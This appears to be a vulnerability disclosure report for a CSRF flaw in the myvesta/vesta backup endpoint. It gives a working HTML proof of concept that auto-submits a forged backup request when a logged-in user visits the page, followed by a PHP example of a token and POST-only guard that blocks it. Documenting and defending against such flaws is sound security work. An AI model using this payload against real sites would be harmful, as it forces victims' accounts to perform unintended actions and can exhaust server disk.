Cross-Site Request Forgery (CSRF) in myvesta/vesta
Aug 24th 2021
This application has weak CSRF protection on its backup functionality. As the PoC.html below shows, when a logged-in user visits an attacker's website, an unintended backup request is sent to the application.
🕵️♂️ Proof of Concept
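<!-- PoC.html -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- No method attribute, so the form is submitted as a GET request -->
    <form action="https://demo.myvesta.com/schedule/backup/">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Submit the first (only) form as soon as the page loads
      document.forms[0].submit();
    </script>
  </body>
</html>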
This vulnerability can force an admin or user into triggering an unintended backup, which consumes server resources and can fill the disk.
Tested on Edge, Firefox, Chrome and Safari.
📍 Location
index.php#L1
📝 References
csrf
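A server-side guard that rejects the forged request from the PoC, as an added example (not code from the original report or from the myvesta project). The function names, the `csrf_token` session key and the `token` request parameter are assumptions, and the endpoint is modeled as a plain function over constructed requests rather than the project's handler.

```php
<?php
// Added example: hypothetical guard for a state-changing endpoint such as
// /schedule/backup/. All names here are assumptions, not the project's code.

function issue_csrf_token(array &$session): string
{
    // One unpredictable token per session, kept server-side and embedded
    // in the application's own forms.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function guard_backup_request(string $method, array $params, array $session): array
{
    // 1. State changes must not be reachable by GET: a cross-site form
    //    without a method attribute, a link or an <img> all issue GET.
    if ($method !== 'POST') {
        return [405, 'method not allowed'];
    }
    // 2. The request must carry the session's token. A missing session
    //    token never matches, and the comparison is constant-time.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $params['token'] ?? '';
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return [403, 'invalid CSRF token'];
    }
    return [200, 'backup scheduled'];
}

// Constructed requests for demonstration (no real traffic).
$session = [];
$token = issue_csrf_token($session);

$cases = [
    'cross-site GET form, no token'     => ['GET',  []],
    'cross-site POST, no token'         => ['POST', []],
    'cross-site POST, guessed token'    => ['POST', ['token' => str_repeat('0', 64)]],
    'same-site POST with session token' => ['POST', ['token' => $token]],
];
foreach ($cases as $label => [$method, $params]) {
    [$status, $message] = guard_backup_request($method, $params, $session);
    printf("%-36s -> %d %s\n", $label, $status, $message);
}
```

Only the last case is accepted; the first case corresponds to the request PoC.html sends. Setting the `SameSite` attribute on the session cookie is a complementary control, not a replacement for the token check.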